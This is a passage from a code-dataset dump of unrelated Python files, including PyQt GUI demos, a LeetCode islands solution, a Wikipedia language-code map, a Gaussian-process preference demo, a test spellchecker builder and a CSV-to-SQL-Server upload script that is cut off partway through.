graph\n","sub_path":"chart_builders/actual_plot.py","file_name":"actual_plot.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51054197","text":"from PyQt5.QtWidgets import QApplication, QWidget, QTextEdit, QVBoxLayout, QPushButton\nimport sys\n\nclass textEditDemo(QWidget):\n def __init__(self):\n super(textEditDemo, self).__init__()\n\n self.setWindowTitle(\"TextEditDemo\")\n self.resize(400, 640)\n\n self.textEdit = QTextEdit()\n self.btnPress1 = QPushButton(\"显示文本\")\n self.btnPress2 = QPushButton(\"显示HTML\")\n\n layout = QVBoxLayout()\n layout.addWidget(self.textEdit)\n layout.addWidget(self.btnPress1)\n layout.addWidget(self.btnPress2)\n self.setLayout(layout)\n\n self.btnPress1.clicked.connect(self.btnPress1_Clicked)\n self.btnPress2.clicked.connect(self.btnPress2_Clicked)\n\n def btnPress1_Clicked(self):\n self.textEdit.setPlainText(\"Hello PyQt5!\\n单击按钮\")\n\n def btnPress2_Clicked(self):\n self.textEdit.setHtml(\"Hello PyQt5!\\n单击按钮。\")\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = textEditDemo()\n win.show()\n sys.exit(app.exec_())","sub_path":"MainWindow/TextEdit/TextEdit.py","file_name":"TextEdit.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"630578488","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Date : 2019-06-24 21:11:06\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os\nimport itertools\nfrom test46 import test46\nimport time\n\n\ndef BFS(adj, start=None):\n \"\"\"\n 广度优先\n 先看周围(邻接的点)\n 再看周围的周围\n 有点类似二叉树层序初始化\n 控制访问的方法是设置flag\n \"\"\"\n\n if not start:\n start = 0 # 从第一个节点开始\n queue = [start]\n # visit(start)\n n = len(adj[0])\n visited = [0 for i in range(n)]\n visited[start] = 1\n while queue:\n start = queue[0]\n for i in range(len(adj[start])):\n if adj[start][i] == 1 and visited[i] == 0:\n # visit(i)\n visited[i] = 1\n queue.append(i)\n del queue[0]\n return visited\n\n\nclass Solution:\n def numIslands(self, grid: list) -> int:\n if grid == []:\n return 0\n # 矩阵转化为图\n h = len(grid)\n w = len(grid[0])\n coords = list(itertools.product(list(range(h)), list(range(w))))\n one_coords = []\n for c in coords:\n if grid[c[0]][c[1]] == '1':\n one_coords.append(c)\n print(\"1 coords\", len(one_coords))\n input()\n n = len(one_coords) # 27141个1\n start = time.clock()\n adj = [[0 for i in range(n)] for j in range(n)] # 27141 * 27141\n elapsed = (time.clock() - start) # 43.808438s\n print(elapsed)\n input()\n combs = itertools.combinations(list(range(n)), 2) # 27141 * 27140 / 2\n for comb in combs:\n i, j = comb\n ith_coord = one_coords[i]\n jth_coord = one_coords[j]\n if jth_coord in [(ith_coord[0]+1, ith_coord[1]), (ith_coord[0]-1, ith_coord[1]), (ith_coord[0], ith_coord[1]+1), (ith_coord[0], ith_coord[1]-1)]:\n adj[i][j], adj[j][i] = 1, 1\n\n # adj, one_coords, n\n visited = [0 for i in range(n)]\n # start = 0\n num_of_islands = 0\n while 0 in visited:\n start = visited.index(0)\n this_visited = BFS(adj, start)\n for i in range(n):\n visited[i] = visited[i] ^ this_visited[i]\n num_of_islands += 1\n\n return num_of_islands\n\n\ndef main():\n test1 = [[\"1\", \"1\", \"1\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\"]]\n test2 = [[\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"1\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"1\", \"1\"]]\n\n grid = test46\n \"\"\"\n test46\n 219 * 250 = 54750个坐标\n 27141 个1\n \"\"\"\n s = Solution()\n num_of_islands = s.numIslands(grid)\n print(num_of_islands)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"leetcode/num-of-island-graph-ver1.py","file_name":"num-of-island-graph-ver1.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24657246","text":"LANGMAP = {\n \"English\": \"en\",\n \"Cebuano\": \"ceb\",\n \"Swedish\": \"sv\",\n \"German\": \"de\",\n \"French\": \"fr\",\n \"Dutch\": \"nl\",\n \"Russian\": \"ru\",\n \"Italian\": \"it\",\n \"Spanish\": \"es\",\n \"Polish\": \"pl\",\n \"Waray-Waray\": \"war\",\n \"Vietnamese\": \"vi\",\n \"Japanese\": \"ja\",\n \"Chinese\": \"zh\",\n \"Portuguese\": \"pt\",\n \"Ukrainian\": \"uk\",\n \"Arabic\": \"ar\",\n \"Persian\": \"fa\",\n \"Serbian\": \"sr\",\n \"Catalan\": \"ca\",\n \"Indonesian\": \"id\",\n \"Finnish\": \"fi\",\n \"Korean\": \"ko\",\n \"Hungarian\": \"hu\",\n \"Serbo-Croatian\": \"sh\",\n \"Czech\": \"cs\",\n \"Romanian\": \"ro\",\n \"Basque\": \"eu\",\n \"Turkish\": \"tr\",\n \"Malay\": \"ms\",\n \"Esperanto\": \"eo\",\n \"Bulgarian\": \"bg\",\n \"Danish\": \"da\",\n \"Armenian\": \"hy\",\n \"Hebrew\": \"he\",\n \"Slovak\": \"sk\",\n \"Min Nan\": \"zh-min-nan\",\n \"Min\": \"zh-min-nan\",\n \"Kazakh\": \"kk\",\n \"Minangkabau\": \"min\",\n \"Chechen\": \"ce\",\n \"Croatian\": \"hr\",\n \"Lithuanian\": \"lt\",\n \"Estonian\": \"et\",\n \"Belarusian\": \"be\",\n \"Slovenian\": \"sl\",\n \"Slovene\": \"sl\",\n \"Greek\": \"el\",\n \"Galician\": \"gl\",\n \"Azerbaijani\": \"az\",\n \"Azeri\": \"az\", # For some reason pages like https://stats.wikimedia.org/archive/squid_reports/2018-01/SquidReportPageViewsPerCountryBreakdownHuge.htm use \"Azeri\" instead of \"Azerbaijani\" but these seem to be the same thing https://en.wikipedia.org/wiki/Azeri_(disambiguation)\n \"Urdu\": \"ur\",\n \"Simple English\": \"simple\",\n \"Simple\": \"simple\",\n \"Norwegian (Nynorsk)\": \"nn\",\n \"Nynorsk\": \"nn\",\n \"Norwegian (Bokmål)\": \"no\",\n \"Norwegian\": \"no\", # Pages like https://stats.wikimedia.org/archive/squid_reports/2018-01/SquidReportPageViewsPerCountryBreakdownHuge.htm just say \"Norwegian\" without clarifying whether it's Bokmal or Nynorsk or both. However Nynorsk is listed separately, so I assume this is Bokmal.\n \"South Azerbaijani\": \"azb\",\n \"Uzbek\": \"uz\",\n \"Thai\": \"th\",\n \"Hindi\": \"hi\",\n \"Latin\": \"la\",\n \"Georgian\": \"ka\",\n \"Volapük\": \"vo\",\n \"Tamil\": \"ta\",\n \"Welsh\": \"cy\",\n \"Macedonian\": \"mk\",\n \"Asturian\": \"ast\",\n \"Tajik\": \"tg\",\n \"Latvian\": \"lv\",\n \"Malagasy\": \"mg\",\n \"Occitan\": \"oc\",\n \"Tatar\": \"tt\",\n \"Bosnian\": \"bs\",\n \"Kirghiz\": \"ky\",\n \"Kyrghyz\": \"ky\",\n \"Afrikaans\": \"af\",\n \"Albanian\": \"sq\",\n \"Tagalog\": \"tl\",\n \"Cantonese\": \"zh-yue\",\n \"Newar\": \"new\",\n \"Nepal Bhasa\": \"new\",\n \"Telugu\": \"te\",\n \"Bengali\": \"bn\",\n \"Belarusian (Taraškievica)\": \"be-tarask\",\n \"be-tarask\": \"be-tarask\",\n \"Breton\": \"br\",\n \"Piedmontese\": \"pms\",\n \"Malayalam\": \"ml\",\n \"Luxembourgish\": \"lb\",\n \"Javanese\": \"jv\",\n \"Haitian\": \"ht\",\n \"Scots\": \"sco\",\n \"Marathi\": \"mr\",\n \"Irish\": \"ga\",\n \"Swahili\": \"sw\",\n \"Bashkir\": \"ba\",\n \"Low Saxon\": \"nds\",\n \"Western Punjabi\": \"pnb\",\n \"Western Panjabi\": \"pnb\",\n \"Western\": \"pnb\",\n \"Icelandic\": \"is\",\n \"Burmese\": \"my\",\n \"West Frisian\": \"fy\",\n \"Frisian\": \"fy\",\n \"Chuvash\": \"cv\",\n \"Sundanese\": \"su\",\n \"Lombard\": \"lmo\",\n \"Aragonese\": \"an\",\n \"Nepali\": \"ne\",\n \"Yoruba\": \"yo\",\n \"Punjabi\": \"pa\",\n \"Gujarati\": \"gu\",\n \"Ido\": \"io\",\n \"Bavarian\": \"bar\",\n \"Sicilian\": \"scn\",\n \"Kurdish\": \"ku\",\n \"Alemannic\": \"als\",\n \"Bishnupriya Manipuri\": \"bpy\",\n \"Kannada\": \"kn\",\n \"Sorani\": \"ckb\",\n \"Interlingua\": \"ia\",\n \"Quechua\": \"qu\",\n \"Egyptian Arabic\": \"arz\",\n \"Egyptian\": \"arz\",\n \"Wu\": \"wuu\",\n \"Mongolian\": \"mn\",\n \"Samogitian\": \"bat-smg\",\n \"Sinhalese\": \"si\",\n \"Sinhala\": \"si\",\n \"Walloon\": \"wa\",\n \"Oriya\": \"or\",\n \"Scottish Gaelic\": \"gd\",\n \"Yiddish\": \"yi\",\n \"Amharic\": \"am\",\n \"Neapolitan\": \"nap\",\n \"Min Dong\": \"cdo\",\n \"Buginese\": \"bug\",\n \"Upper Sorbian\": \"hsb\",\n \"Banyumasan\": \"map-bms\",\n \"Maithili\": \"mai\",\n \"mai\": \"mai\",\n \"Mingrelian\": \"xmf\",\n \"xmf\": \"xmf\",\n \"Faroese\": \"fo\",\n \"Mazandarani\": \"mzn\",\n \"Limburgish\": \"li\",\n \"Ilokano\": \"ilo\",\n \"Sakha\": \"sah\",\n \"Emilian-Romagnol\": \"eml\",\n \"Venetian\": \"vec\",\n \"Ossetian\": \"os\",\n \"Sanskrit\": \"sa\",\n \"Sindhi\": \"sd\",\n \"Hill Mari\": \"mrj\",\n \"Zazaki\": \"diq\",\n \"Meadow Mari\": \"mhr\",\n \"Eastern Mari\": \"mhr\",\n \"Pashto\": \"ps\",\n \"Fiji Hindi\": \"hif\",\n \"Tarantino\": \"roa-tara\",\n \"Classical Chinese\": \"zh-classical\",\n \"Central Bicolano\": \"bcl\",\n \"Acehnese\": \"ace\",\n \"Hakka\": \"hak\",\n \"North Frisian\": \"frr\",\n \"frr\": \"frr\",\n \"Kapampangan\": \"pam\",\n \"Silesian\": \"szl\",\n \"Northern Sotho\": \"nso\",\n \"Northern Sami\": \"se\",\n \"Khmer\": \"km\",\n \"Navajo\": \"nv\",\n \"Western Armenian\": \"hyw\",\n \"Maori\": \"mi\",\n \"Rusyn\": \"rue\",\n \"rue\": \"rue\",\n \"Nahuatl\": \"nah\",\n \"Dutch Low Saxon\": \"nds-nl\",\n \"West Flemish\": \"vls\",\n \"Bihari\": \"bh\",\n \"Crimean Tatar\": \"crh\",\n \"Gan\": \"gan\",\n \"Sardinian\": \"sc\",\n \"Vepsian\": \"vep\",\n \"Tibetan\": \"bo\",\n \"Gilaki\": \"glk\",\n \"Corsican\": \"co\",\n \"Erzya\": \"myv\",\n \"Turkmen\": \"tk\",\n \"Võro\": \"fiu-vro\",\n \"Assamese\": \"as\",\n \"Somali\": \"so\",\n \"Northern Luri\": \"lrc\",\n \"Komi\": \"kv\",\n \"Kashubian\": \"csb\",\n \"Cashubian\": \"csb\",\n \"Manx\": \"gv\",\n \"Shan\": \"shn\",\n \"Udmurt\": \"udm\",\n \"Zeelandic\": \"zea\",\n \"Zealandic\": \"zea\",\n \"Interlingue\": \"ie\",\n \"Picard\": \"pcd\",\n \"pcd\": \"pcd\",\n \"Aymara\": \"ay\",\n \"Shona\": \"sn\",\n \"Uyghur\": \"ug\",\n \"Uighur\": \"ug\",\n \"Norman\": \"nrm\",\n \"Saterland Frisian\": \"stq\",\n \"Lezgian\": \"lez\",\n \"lez\": \"lez\",\n \"Ladino\": \"lad\",\n \"Cornish\": \"kw\",\n \"Mirandese\": \"mwl\",\n \"Goan Konkani\": \"gom\",\n \"gom\": \"gom\",\n \"Guarani\": \"gn\",\n \"Hawaiian\": \"haw\",\n \"Romansh\": \"rm\",\n \"Ligurian\": \"lij\",\n \"Hausa\": \"ha\",\n \"Abkhazian\": \"ab\",\n \"Komi-Permyak\": \"koi\",\n \"koi\": \"koi\",\n \"Kabyle\": \"kab\",\n \"Maltese\": \"mt\",\n \"Lao\": \"lo\",\n \"Laotian\": \"lo\",\n \"Lingua Franca Nova\": \"lfn\",\n \"Friulian\": \"fur\",\n \"Franco-Provençal\": \"frp\",\n \"Lower Sorbian\": \"dsb\",\n \"Lingala\": \"ln\",\n \"Anglo-Saxon\": \"ang\",\n \"Extremaduran\": \"ext\",\n \"Livvi-Karelian\": \"olo\",\n \"Zamboanga Chavacano\": \"cbk-zam\",\n \"Doteli\": \"dty\",\n \"Divehi\": \"dv\",\n \"Ripuarian\": \"ksh\",\n \"Gagauz\": \"gag\",\n \"gag\": \"gag\",\n \"Pali\": \"pi\",\n \"Pangasinan\": \"pag\",\n \"Palatinate German\": \"pfl\",\n \"Avar\": \"av\",\n \"Banjar\": \"bjn\",\n \"bjn\": \"bjn\",\n \"Buryat\": \"bxr\",\n \"Kalmyk\": \"xal\",\n \"Gorontalo\": \"gor\",\n \"Karachay-Balkar\": \"krc\",\n \"krc\": \"krc\",\n \"Papiamentu\": \"pap\",\n \"Zhuang\": \"za\",\n \"Karakalpak\": \"kaa\",\n \"Pennsylvania German\": \"pdc\",\n \"Kinyarwanda\": \"rw\",\n \"Tuvan\": \"tyv\",\n \"Tongan\": \"to\",\n \"Greenlandic\": \"kl\",\n \"Novial\": \"nov\",\n \"Jamaican Patois\": \"jam\",\n \"Aramaic\": \"arc\",\n \"Kabiye\": \"kbp\",\n \"Kabardian Circassian\": \"kbd\",\n \"Tok Pisin\": \"tpi\",\n \"Tetum\": \"tet\",\n \"Igbo\": \"ig\",\n \"Kikuyu\": \"ki\",\n \"Nauruan\": \"na\",\n \"Lojban\": \"jbo\",\n \"Lak\": \"lbe\",\n \"Aromanian\": \"roa-rup\",\n \"Tahitian\": \"ty\",\n \"Bislama\": \"bi\",\n \"Kongo\": \"kg\",\n \"Moksha\": \"mdf\",\n \"Wolof\": \"wo\",\n \"Luganda\": \"lg\",\n \"Ganda\": \"lg\",\n \"Zulu\": \"zu\",\n \"Sranan\": \"srn\",\n \"Tulu\": \"tcy\",\n \"Ingush\": \"inh\",\n \"Atikamekw\": \"atj\",\n \"Cherokee\": \"chr\",\n \"Latgalian\": \"ltg\",\n \"ltg\": \"ltg\",\n \"Samoan\": \"sm\",\n \"Xhosa\": \"xh\",\n \"Oromo\": \"om\",\n \"Santali\": \"sat\",\n \"Norfolk\": \"pih\",\n \"Old Church Slavonic\": \"cu\",\n \"Romani\": \"rmy\",\n \"Twi\": \"tw\",\n \"Bambara\": \"bm\",\n \"Tswana\": \"tn\",\n \"Setswana\": \"tn\",\n \"Cheyenne\": \"chy\",\n \"Kirundi\": \"rn\",\n \"Gothic\": \"got\",\n \"Tsonga\": \"ts\",\n \"Tumbuka\": \"tum\",\n \"Akan\": \"ak\",\n \"Sesotho\": \"st\",\n \"Chichewa\": \"ny\",\n \"Chamorro\": \"ch\",\n \"Swati\": \"ss\",\n \"Siswati\": \"ss\",\n \"Pontic\": \"pnt\",\n \"Fijian\": \"fj\",\n \"Inuktitut\": \"iu\",\n \"Adyghe\": \"ady\",\n \"Ewe\": \"ee\",\n \"Kashmiri\": \"ks\",\n \"Venda\": \"ve\",\n \"Inupiak\": \"ik\",\n \"Sango\": \"sg\",\n \"Sangro\": \"sg\", # This shows up in 2017-09; I think it's a typo\n \"Fula\": \"ff\",\n \"Dzongkha\": \"dz\",\n \"Tigrinya\": \"ti\",\n \"Cree\": \"cr\",\n \"Dinka\": \"din\",\n \"Ndonga\": \"ng\",\n \"Choctaw\": \"cho\",\n \"Kuanyama\": \"kj\",\n \"Marshallese\": \"mh\",\n \"Hiri Motu\": \"ho\",\n \"Sichuan Yi\": \"ii\",\n \"Afar\": \"aa\",\n \"Muscogee\": \"mus\",\n \"Herero\": \"hz\",\n \"Kanuri\": \"kr\",\n \"Low\": \"nds\", # This page (https://stats.wikimedia.org/wikimedia/squids/SquidReportPageViewsPerLanguageBreakdown.htm) indicates that \"Low\" is Low Saxon\n \"ten\": \"en\", # ten.wikipedia.org was a temporary wiki for the 10-year anniversary of Wikipedia. For ease, I will count the views on this under English Wikipedia\n \"nb\": \"no\", # Verified that nb.wikipedia.org redirects to no.wikipedia.org\n \"zh-tw\": \"zh\", # Verified that zh-tw.wikipedia.org redirects to zh.wikipedia.org; see also https://en.wikipedia.org/wiki/Chinese_Wikipedia#Automatic_conversion_between_traditional_and_simplified_Chinese_characters\n}\n","sub_path":"langmap.py","file_name":"langmap.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646742547","text":"# Simple 1D GP classification example\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport GPpref\nimport scipy.optimize as op\nimport plot_tools as ptt\nimport test_data\n# from scipy.stats import beta\nplt.rc('font',**{'family':'serif','sans-serif':['Computer Modern Roman']})\nplt.rc('text', usetex=True)\nnp.random.seed(1)\n\ntrain_hyper = True\nuse_test_data = False\nverbose = True\n\n#log_hyp = np.log([0.2, 0.5, 0.1, 1.0, 10.0]) # length_scale/s, sigma_f, sigma_n_abs, sigma_beta, v_beta\n# log_hyp = np.log([0.07, 1.0, 0.25, 1.0, 28.1])\n# log_hyp = np.log([0.065, 0.8, 0.8, 0.8, 20.0])\nlog_hyp = np.log([0.05, 1.5, 0.09, 2.0, 50.0])\nnp.random.seed(0)\n\nn_rel_train = 30\nn_abs_train = 30\nrel_sigma = 0.02\ndelta_f = 1e-5\n\nbeta_sigma = 0.8\nbeta_v = 100.0\n\nn_xplot = 101\nn_mcsamples = 1000\nn_ysamples = 101\n\n# Define polynomial function to be modelled\n#true_function = test_data.zero_fun\nrandom_wave = test_data.VariableWave([0.6, 1.2], [5.0, 10.0], [0.0, 1.0], [10.0, 20.0])\nrandom_wave.randomize()\nrandom_wave.set_values(a=1.2, f=6.0, o=.2, d=20.0)\ntrue_function = random_wave.out\nrandom_wave.print_values()\n\nrel_obs_fun = GPpref.RelObservationSampler(true_function, GPpref.PrefProbit(sigma=rel_sigma))\nabs_obs_fun = GPpref.AbsObservationSampler(true_function, GPpref.AbsBoundProbit(sigma=beta_sigma, v=beta_v))\n\n# Main program\n# True function\nx_plot = np.linspace(0.0,1.0,n_xplot,dtype='float')\nx_test = np.atleast_2d(x_plot).T\nf_true = abs_obs_fun.f(x_test)\nmu_true = abs_obs_fun.mean_link(x_test)\nmc_samples = np.random.normal(size=n_mcsamples)\nabs_y_samples = np.atleast_2d(np.linspace(0.01, 0.99, n_ysamples)).T\np_abs_y_true = abs_obs_fun.observation_likelihood_array(x_test, abs_y_samples)\np_rel_y_true = rel_obs_fun.observation_likelihood_array(x_test)\n\n# Training data - this is a bit weird, but we sample x values, then the uv pairs\n# are actually indexes into x, because it is easier computationally. You can \n# recover the actual u,v values using x[ui],x[vi]\nif use_test_data:\n x_rel, uvi_rel, uv_rel, y_rel, fuv_rel, x_abs, y_abs, mu_abs = test_data.data1()\nelse:\n x_rel, uvi_rel, uv_rel, y_rel, fuv_rel = rel_obs_fun.generate_n_observations(n_rel_train)\n x_abs, y_abs, mu_abs = abs_obs_fun.generate_n_observations(n_abs_train)\n\n# Construct GP object\nprefGP = GPpref.PreferenceGaussianProcess(x_rel, uvi_rel, x_abs, y_rel, y_abs,\n delta_f=delta_f,\n rel_likelihood=GPpref.PrefProbit(),\n abs_likelihood=GPpref.AbsBoundProbit(), verbose=verbose)\n\n# If training hyperparameters, use external optimiser\nif train_hyper:\n log_hyp = op.fmin(prefGP.calc_nlml,log_hyp)\n\nf = prefGP.calc_laplace(log_hyp)\nprefGP.print_hyperparameters()\n\n# Latent predictions\nfhat, vhat = prefGP.predict_latent(x_test)\n\n# Expected values\nE_y = prefGP.abs_posterior_mean(x_test, fhat, vhat)\n\n# Posterior likelihoods (MC sampled for absolute)\np_abs_y_post = prefGP.abs_posterior_likelihood(abs_y_samples, fhat=fhat, varhat=vhat, normal_samples=mc_samples)\np_rel_y_post = prefGP.rel_posterior_likelihood_array(fhat=fhat, varhat=vhat)\n\n\n# Plot true functions\nfig_t, (ax_t_l, ax_t_a, ax_t_r) = ptt.true_plots(x_test, f_true, mu_true, rel_sigma,\n abs_y_samples, p_abs_y_true, p_rel_y_true,\n x_abs, y_abs, uv_rel, fuv_rel, y_rel,\n t_l=r'True latent function, $f(x)$')\n\n# Posterior estimates\nfig_p, (ax_p_l, ax_p_a, ax_p_r) = \\\n ptt.estimate_plots(x_test, f_true, mu_true, fhat, vhat, E_y, rel_sigma,\n abs_y_samples, p_abs_y_post, p_rel_y_post,\n x_abs, y_abs, uv_rel, fuv_rel, y_rel,\n t_a=r'Posterior absolute likelihood, $p(y | \\mathcal{Y}, \\theta)$',\n t_r=r'Posterior relative likelihood $P(x_0 \\succ x_1 | \\mathcal{Y}, \\theta)$')\n\nplt.show()\n\n\n## SCRAP\n# p_y = np.zeros((n_ysamples, n_xplot))\n# y_samples = np.linspace(0.01, 0.99, n_ysamples)\n# iny = 1.0/n_ysamples\n# E_y2 = np.zeros(n_xplot)\n#\n# normal_samples = np.random.normal(size=n_mcsamples)\n# for i,(fstar,vstar) in enumerate(zip(fhat, vhat.diagonal())):\n# f_samples = normal_samples*vstar+fstar\n# aa, bb = prefGP.abs_likelihood.get_alpha_beta(f_samples)\n# p_y[:, i] = [iny*np.sum(beta.pdf(yj, aa, bb)) for yj in y_samples]\n# p_y[:, i] /= np.sum(p_y[:, i])\n# E_y2[i] = np.sum(np.dot(y_samples, p_y[:, i]))","sub_path":"GP_preference_demo.py","file_name":"GP_preference_demo.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"375829699","text":"# -*- coding:utf-8 -*-\n\nimport os\n\nfrom hunspell import module_paths_from_filters, build_files\n\nimport common\n\n\nclass Manager(object):\n\n def __init__(self):\n\n self.builtSpellCheckers = {}\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n\n for path in self.builtSpellCheckers.iterkeys():\n os.remove(path + u\".aff\")\n os.remove(path + u\".dic\")\n\n try:\n os.rmdir(common.getBuildPath())\n except:\n pass\n\n def getUnusedCode(self):\n\n buildPath = common.getBuildPath()\n\n if not os.path.exists(buildPath):\n return 1\n\n index = 2\n while os.path.exists(os.path.join(buildPath, u\"{}.aff\".format(index))):\n index += 1\n return index\n\n def create(self, config):\n\n for builtPath, builtConfig in self.builtSpellCheckers.iteritems():\n if config == builtConfig:\n return builtPath\n\n module_paths = module_paths_from_filters(config,\n language=config[\"language\"])\n file_name = unicode(self.getUnusedCode())\n folder_path = common.getBuildPath()\n build_files(module_paths=module_paths, language=config[\"language\"],\n output_file_name=file_name, output_folder=folder_path)\n path = os.path.join(folder_path, file_name)\n self.builtSpellCheckers[path] = config\n return path\n","sub_path":"tests/module_tests/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"464239052","text":"#!/usr/bin/env python\n\nimport sys\nfrom collections import Counter\nfrom PyQt4 import QtGui, QtCore\n\nclass Ngram(QtGui.QWidget):\n\n def __init__(self):\n super(Ngram, self).__init__()\n self.setWindowTitle(\"Unigrams\")\n self.initUI()\n\n def initUI(self):\n self.cbox = QtGui.QComboBox()\n self.cbox.addItems([\"Bigrams\", \"Unigrams\"])\n self.cbox.currentIndexChanged.connect(self.gramSelect)\n\n self.pbut = QtGui.QPushButton('File', self)\n self.pbut.clicked.connect(self.showGrams)\n\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n self.setLayout(self.grid)\n self.grid.addWidget(self.cbox, 1, 0)\n self.grid.addWidget(self.pbut, 1, 1)\n\n self.show()\n\n def gramSelect(self):\n bigram = True\n if self.cbox.currentText() == \"Unigrams\":\n bigram = False\n return bigram\n\n def showGrams(self):\n self.infile = QtGui.QFileDialog.getOpenFileName(self)\n\n while self.grid.count():\n child = self.grid.takeAt(0)\n if child.widget() is not None:\n child.widget().deleteLater()\n elif child.layout() is not None:\n clearLayout(child.layout())\n\n if self.gramSelect() == False:\n for i, (word, freq) in enumerate(self.unigramCounter()):\n self.grid.addWidget(QtGui.QLabel(word), i, 0)\n self.grid.addWidget(QtGui.QLabel(str(freq)), i, 1)\n\n else:\n for i, (bigram, freq) in enumerate(self.bigramCounter()):\n self.grid.addWidget(QtGui.QLabel(bigram[0]), i, 0)\n self.grid.addWidget(QtGui.QLabel(bigram[1]), i, 1)\n self.grid.addWidget(QtGui.QLabel(str(freq)), i, 2)\n\n def unigramCounter(self):\n self.uniCounter = Counter()\n for line in open(self.infile):\n self.uniCounter.update(line.split())\n return self.uniCounter.most_common(20)\n\n def bigramCounter(self):\n self.ngramCounter = Counter()\n self.listOfBigrams = []\n\n for line in open(self.infile):\n self.sentence = line.split()\n self.bigramList = []\n for i in range(len(self.sentence) - 1):\n self.bigram = self.sentence[i], self.sentence[i + 1]\n self.bigramList.append(self.bigram)\n self.ngramCounter.update(self.bigramList)\n self.listOfBigrams.append(self.bigramList)\n\n return self.ngramCounter.most_common(20)\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n n = Ngram()\n app.exec_()\n","sub_path":"tel_ngram.py","file_name":"tel_ngram.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104358218","text":"# UPLOAD_Process_MONTHLY_CSV_Files.py\nimport logging\nimport pyodbc\nimport os\nimport csv\nfrom datetime import datetime\nfrom collections import OrderedDict\n\nimport sys\nif len(sys.argv) < 2:\n print('missing arg[1]')\n sys.exit()\n\nprint(sys.argv[0])\nprint(sys.argv[1])\nenvironment_list = ['local','dev','prod']\ndatabase = 'VFH'\nif sys.argv[1] == 'local':\n server = 'DESKTOP-9NHID61'\n logging_filename = r'D:\\COW\\WPA\\VFH\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'dev':\n logging_filename = r'\\\\cowsvdwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvdwx123\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'prod':\n logging_filename = r'\\\\cowsvpwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvpwx123\\wpaptp\\UPLOAD'\nprint('logging_filename '+logging_filename)\nprint('upload_folder '+upload_folder)\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logging_filename,\n filemode='w')\n# define a Handler which writes INFO messages or higher to the sys.stderr\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\nconnect_string = 'DRIVER={SQL Server Native Client 11.0};SERVER='+server+';DATABASE='+database+';Trusted_Connection=yes;'\nprint(connect_string)\n\ntry:\n cnxn = pyodbc.connect(connect_string)\nexcept pyodbc.Error as ex:\n #sqlstate = ex.args[0]\n print(ex)\n logger2 = logging.getLogger(connect_string)\n logger2.error(ex)\n sys.exit()\n\ncursor = cnxn.cursor()\n\nextension = '.csv'\ntable = 'MONTHLYTRIP'\n\nfor root, dirs, files in os.walk(upload_folder):\n print(\"upload_folder \"+upload_folder)\n print(\"root \"+ root)\n print(\"dirs \")\n print(dirs)\n print(\"files \")\n print(files)\n for fname in files:\n if os.path.splitext(fname)[-1] == extension:\n if any(ext in fname for ext in table):\n processedVar = True\n company_name_dir = root \n print(\"company_name_dir \"+company_name_dir)\n company_name_dir_fname = os.path.join(root, fname) \n print(\"company_name_dir_fname \"+company_name_dir_fname)\n print(\"fname \"+fname)\n CompanyName = fname.split(\"+\",1)[0]\n print(\"CompanyName \"+CompanyName)\n #ftpdate = fname.split(\"+\",2)[1]\n #print(\"ftpdate \"+ftpdate)\n #FTPDate = datetime.strptime(ftpdate, \"%Y%m%d_%H%M%S\")\n #print(FTPDate)\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('begin processing...')\n#[CompanyName] ,[FTPDate] ,[TotalTripsDispatcherStandard] ,[TotalTripsDispatcherAccessible] ,[TotalVehiclesPTPStandard] ,[TotalVehiclesPTPAccessible]) VALUES (\"\n\n with open(company_name_dir_fname, encoding='utf-8-sig') as f:\n\n first_column = True\n for row in csv.DictReader(f):\n\n print(\"row \")\n print(row)\n myDict = OrderedDict(row)\n\n #parameter_markers = ', '.join(['%s'] * len(myDict))\n parameter_markers = ', '.join(['?'] * len(myDict))\n print(\"parameter_markers\")\n print(parameter_markers)\n columns = \", \".join(myDict.keys())\n print(\"columns\")\n print(columns)\n values = \", \".join(repr(e) for e in myDict.values())\n print(\"values\")\n print(values)\n #sql = \"INSERT INTO %s ( %s ) VALUES ( %s )\" % (table, columns, parameter_markers)\n 